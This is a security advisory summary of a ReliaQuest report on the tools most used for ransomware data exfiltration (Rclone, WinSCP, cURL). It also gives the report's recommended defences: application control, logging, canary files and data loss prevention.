Summary:
Data exfiltration has become a key component in double extortion ransomware attacks, which are now a prevalent method used by cybercriminals. According to a new report by ReliaQuest, the top three tools used for data exfiltration between September 2023 and July 2024 are Rclone, WinSCP, and cURL. Data exfiltration involves the unauthorized transfer of data from enterprise or personal devices, often through threat actor–owned infrastructure or third-party cloud services. Cybercriminals use these tools to collect and extract large amounts of data, threatening to leak it if the victim doesn't pay the ransom.

Rclone, an open-source command-line utility, is the most widely used exfiltration tool, involved in 57% of ransomware incidents during the reported period. Its popularity stems from its fast data-transfer capabilities, cross-platform support, and ability to integrate with numerous cloud services, making it difficult for defenders to mitigate.

WinSCP, another open-source file transfer utility, is known for its user-friendly interface and is trusted by organizations, making it less likely to raise suspicion when found on a system. It offers efficient data transfers with robust error handling and logging features.

cURL, a command-line tool that transfers data via URLs, is often used for interacting with web services and is native to Windows 10, allowing attackers to use it without needing to install additional software. While not as reliable for large-scale data exfiltration as Rclone and WinSCP, cURL is effective for extracting critical information.


Security Officer Comments:
ReliaQuest also notes that other tools, such as MEGA Cloud Storage, FileZilla, Restic, and remote monitoring and management (RMM) software, are also used by cybercriminals for data exfiltration.

Suggested Corrections:
ReliaQuest recommends the following measures to prevent or reduce the impact of data-exfiltration attempts:

• Application control: Organizations should enforce application controls through Group Policy Objects (GPOs) or other means to prevent the execution of unauthorized applications, including those capable of exfiltrating data.
• Restricting access to abused commercial services: Threat actors frequently exploit commercial services to appear legitimate and blend into the target environment, bypassing reputation-based controls. In most of the incidents ReliaQuest responded to, threat actors used widely available services like MEGA cloud storage and Dropbox for data exfiltration. Organizations should identify the services in use and implement corresponding restrictions, such as categorical restrictions on their proxy or DNS and limitations on RMM software via application control.
• Logging and visibility: Security teams can only act on what they can see within their environment. It is crucial to ensure critical infrastructure, and the broader environment, are forwarding activity logs to a centralized location. This logging and visibility allow security teams to implement correlation-based detection rules, investigate threats, and rapidly respond to and contain incidents resulting from exfiltration tools.
• Use of canary files: Canary files or folders serve as decoys placed within an environment to detect unauthorized operations. These files or folders are presented as valuable and act as traps for threat actors. Implementation of canary files allows security teams to establish rules to detect modifications and respond rapidly, reducing potential damage from an exfiltration attempt.
• Implement data loss prevention (DLP) tools: Organizations should deploy DLP tools to identify, classify, and monitor sensitive data to protect against unauthorized access. DLP tools can integrate with directory services and apply role-based access controls, enabling the creation of custom policies for specific user groups.

Link(s):
https://www.infosecurity-magazine.com/news/rclone-winscp-curl-top-data/